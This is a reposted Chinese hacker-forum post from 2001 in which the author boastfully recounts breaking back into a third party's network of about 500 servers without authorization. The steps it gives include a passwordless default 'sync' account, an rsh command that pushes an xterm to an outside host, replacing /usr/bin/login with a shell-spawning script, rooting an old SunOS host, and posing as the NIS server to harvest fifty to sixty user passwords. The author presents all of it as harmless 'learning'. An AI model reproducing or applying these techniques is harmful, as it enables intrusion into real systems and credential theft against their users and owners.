TAG:
|
<br/>转载:inburst(闯入) <br/>来源:freedemon@citiz.net <br/><br/>发信人:freedemon(freedemon),信区:灌水王潮 <br/>标?题:我也来贴一篇 -- 咱们本门的功夫。不过比他就差远了。 <br/>发信站:安全焦点(2001-11-16 14:52:35) <br/><br/>无聊,上网逛逛,想起某地我还有一个网络有OpenVMS 7.5,半年没玩儿了,过去瞧瞧。 <br/><br/>一瞧,顿然觉得失败,半年没见,那边的Admin竟然重新对所有机器进行了安全加强配置,而我当年竟然一时心软,没留一个隐蔽一点的后门 -- 连shadow都没拉回来 -- 失败,太失败了。 <br/><br/>不甘心哪,我的500台大机 -- AIX,HP-UX,Tru64,Irix还有变态西西的VMS... <br/><br/>实在是不甘心,我一定要再拿回来! <br/><br/>好吧,开始扫描,再看看它有什么漏洞。 <br/><br/>======================================================================== <br/><br/>所有的机器都是用nis集中认证,用户home也都是nfs的,每种平台都坚持最少服务原则,开放的服务也都打了补丁的...呜呜呜,看来是没漏洞了吗? <br/><br/>试,试试试,再试! <br/><br/>没用,所有的远程溢出都没用,只有一台机器开了Finger,结果还告诉我:你的地址已被记录在案 -- 晕倒。 <br/><br/>好吧,忽然,发现一台粉老粉老的东东,keep? <br/>竟然是Sun OS 4.13,呵呵,拿来做留念的啊? <br/>这台也是NFS服务器之一,showmount一下,竟然有两百多台机器nfs在这里。 <br/><br/>服务开放:22,110,512,513,6000没了... <br/><br/>看来没希望啦? <br/>老机有老机的应付方法,某些老系统可是存在一个却省账号 -- sync的哦。 <br/>而且很多系统中这个账号都是没有passwd的!好吧,就这么办。 <br/><br/>ssh连接,试探一下,OK!果然没有密码...可惜,也没有shell :_< <br/>sync账号的却省shell当然就是sync了嘛! <br/><br/>好像还是没有用。 <br/>ssh不行,咱们rlogin再试试看...不行,还是不行... <br/><br/>进不去?那咱们就让他出来... <br/>rsh -l sync keep \\"/usr/openwin/bin/xterm -display xfocus.com:0\\" <br/><br/>不行,好像是超时,再试,还是不行,看来是做了某些设置了...又失败。 <br/><br/>快绝望了...呜呜呜...Quack哪,再给我多一点点... <br/><br/>忽然间,从眼泪中看到了灵光一闪!能X?那我当然也能X进去啦。 <br/><br/>Ok,xdmcp,query,连接...失败...还是不行那... <br/>这回真的绝望了...睡觉去。 <br/><br/>======================================================================== <br/><br/>一觉醒来,到别的机器上看看,X登录到了两台机器,忽然之间灵机一动 -- 如果一台机器同时有几台机器Xdmcp的话,那X屏幕号就不是0了!而我的X一直设的:0! <br/><br/>改成:9,继续登录,几秒钟停顿之后,终于出现了激动人心的OpenWindow登录界面!激动呀!真的好激动!user:sync pass:,进去了! <br/><br/>几分钟之后,心情又从激动变成了空虚... <br/>为什么上天对我如此的不公...那个弱智root,sync账号的xinitrc竟然有错误,我不但不能得到一个却省的xterm,而且能够运行的程序还只有两个 -- xedit和文件管理器 -- 没有一个shell,还是一切都等于0. <br/><br/>算了,这种情况也不是没有遇见过,至少sync还是和root同组的嘛,四处逛逛,要是它哪个文件权限设错,哪就,嘿嘿嘿嘿~~~ <br/><br/>/.rhosts,读都不能读;/.xxxrc,都是只读;/.....没了 <br/>/etc,继续检查,发现hosts.allow,倒是我这个组可写,可惜修改了也没什么用... <br/>/etc/passwd倒是可以看,可惜我不报多大希望crack它的...这边的密码强度我是早见识过 -- 除非是8位以上的穷举... <br/><br/>看来是没办法了...无意之间,逛到了/usr,幸运之神再一次降临到了我的脚下,哈哈,/usr -rwxrwxr--! <br/><br/>算你倒霉,竟然/usr属于我这个组,而且同组可写!虽然bin我不能修改... <br/>好吧,冒一次险,我mv /usr/bin! <br/><br/>没有shell真的好痛苦呀,我还得忍受奇慢无比的X......点一下鼠标它要10分钟才能反应过来 -- 不愧是古董级得机器! <br/><br/>慢慢的,在文件管理其中执行了如下操作: <br/>mv /usr/bin /usr/binn <br/>mkdir /usr/bin <br/>然后写了一个脚本,叫做sync,里面有一条命令,xterm什么的......嘿嘿嘿 <br/><br/>哪边再登录一次... God!报错!/bin/login not found. <br/>我竟然犯了那么危险的一个错误! <br/>忘了这一点...好险,好吧, <br/>mv /usr/bin/sync /usr/bin/login <br/><br/>再登录......终于,我这边的X缓慢的出现了一个term...松了一口气。 <br/>赶快把/usr/binn改回去,一面有人登录就麻烦了。 <br/><br/>既然有了一个shell,后面就都简单了,从SunOS古老的漏洞中随便选几个出来,i am root! <br/><br/>既然是nis,su某用户就可以通行无阻啦!俺是良民嘛! <br/><br/>======================================================================== <br/>接下来的几天里,就是拿着良民证到处看看,最后选定一台HP-UX作为基地,用俺的独家利器得到了root,先备份回整个NIS数据库;然后让真正的NIS Server睡一会会儿觉,我就暂时替他看着,这一会儿嘛,当然会有很多用户到我这儿来报道啦,密码一个个等级好,差不多五六十个了。叫醒nis,我睡觉去了。 <br/><br/>虽然只有五六十个普通用户,但是可是有500台各种平台的机器玩啊,俺又没那么黑,非要各个都是root. <br/><br/>重在学习嘛! (inburst(闯入)) |